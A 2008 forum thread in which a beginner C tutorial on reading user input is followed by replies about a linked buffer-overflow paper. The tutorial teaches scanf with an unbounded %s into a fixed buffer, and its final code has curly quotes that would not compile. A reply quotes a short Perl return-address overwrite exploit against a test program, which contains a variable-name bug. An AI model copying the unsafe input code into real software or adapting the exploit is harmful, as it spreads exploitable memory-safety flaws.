[TUT][C] Handling User Input

Discussion in 'Programming General' started by Affix, Oct 15, 2008.

[TUT][C] Handling User Input
  1. Unread #1 - Oct 15, 2008 at 4:08 AM
  2. Affix
    Joined:
    Oct 15, 2008
    Posts:
    12
    Referrals:
    0
    Sythe Gold:
    0

    Affix Newcomer

    [TUT][C] Handling User Input

    Ok my Second C tut and some people asked me to Include some Variables with User input.

    Lets Begin.

    Create your main class and add the include stdio.h

    Code:
    #include <stdio.h>
    
    int main() {
    
    }
    Now we shall crate our variable. Lets call it Name and allow it to accept 1024 bytes

    To do this we use the char* variable

    Code:
    char name[1024];

    The [1024] after name is optional and is called the buffer. It defines how many bytes of information the applicatoin can hold. This can cause problems with buffer overflow exploits

    Now we need to have some user interaction. Lets make the application ask for the users name

    Code:
    printf("Please enter your name!\n");
    Ok to allow the user to enter their name we use the scanf function

    The scanf function should look like this

    Code:
    scanf("%s", name);
    Notice our variable is mentioned there. this just tell the scanf function where to store the user input

    Now we should make the application do a greeting. To make it greet simply print a message using the variable.

    To print the variable we need to use %s and define what it is at the end. to do this add the following line.

    Code:
    printf("Hello %s congradulations on your C Application\n", name);
    Right thats your basic C application using Variables. This can be run in Linux, Windows, and Mac

    The final code should be similar to bellow

    Code:
    #include <stdio.h>
    
    int main() {
         char name[1024];
         printf(”Please enter your name below!\n”);
         scanf(”%s”, name);
         printf(”Hello %s Congrats on the C app\n”, name);
    
         return 0;
    }
    If you wish to learn about Buffer Overflow : http://static.ihack.co.uk/affix/Discovery_of_Local_BoF_Exploits.pdf
     
  3. Unread #2 - Oct 23, 2008 at 3:42 PM
  4. -------owned-------
    Joined:
    Jan 27, 2007
    Posts:
    1,225
    Referrals:
    0
    Sythe Gold:
    0

    -------owned------- Guru
    Banned

    [TUT][C] Handling User Input

    Sythe isn't a hacking site, please remove the BoF link.
    It's for your own good, you don't want to get banned.
     
  5. Unread #3 - Oct 24, 2008 at 2:18 AM
  6. Swan
    Joined:
    Jan 23, 2007
    Posts:
    4,957
    Referrals:
    0
    Sythe Gold:
    0
    Sythe's 10th Anniversary Member of the Month Winner

    Swan When They Cry...
    Retired Global Moderator

    [TUT][C] Handling User Input

    Actually, hacking is a misinterpreted term.

    A 'hack' is simply a bunch of code put together from other little bits. I guess one could say Linux is a hack of UNIX, and so on.

    Hacking in itself isn't illegal, but what you break in to (common term 'hack') can be. Compare it to BitTorrent. BT is legal, but what you download on it may not be.
     
  7. Unread #4 - Oct 24, 2008 at 7:13 AM
  8. Affix
    Joined:
    Oct 15, 2008
    Posts:
    12
    Referrals:
    0
    Sythe Gold:
    0

    Affix Newcomer

    [TUT][C] Handling User Input

    And Buffer overflow isnt necessarily hacking

    Its a flaw in code. I linked to my paper to show the damages it causes
     
  9. Unread #5 - Oct 29, 2008 at 3:16 PM
  10. -------owned-------
    Joined:
    Jan 27, 2007
    Posts:
    1,225
    Referrals:
    0
    Sythe Gold:
    0

    -------owned------- Guru
    Banned

    [TUT][C] Handling User Input

    We aren't allowed to discuss password cracking either.
    Cracking your local WinXP passwords isn't illegal, is it?

    And there's an exploit written in the paper:
    Code:
    #!/usr/bin/perl
    my $data="\x41"x28; # create the 28 byte length junk data
    my $ret="\x02\x13\x40\x00"; # our evil EIP goes here
    my $exploit=$junkdata.$ret; # merge them into one string
    print "Sending exploit....\n\n";
    system("vapp.exe", $exploit); # execute vuln.exe with the evil argument string
    print "\nCompleted!\n";
    
    Edit: Yes, I know that is just for their stupid test application.
     
< Help with Fonts | Quadratic formula solver in C >

Users viewing this thread
1 guest


 
 
Adblock breaks this site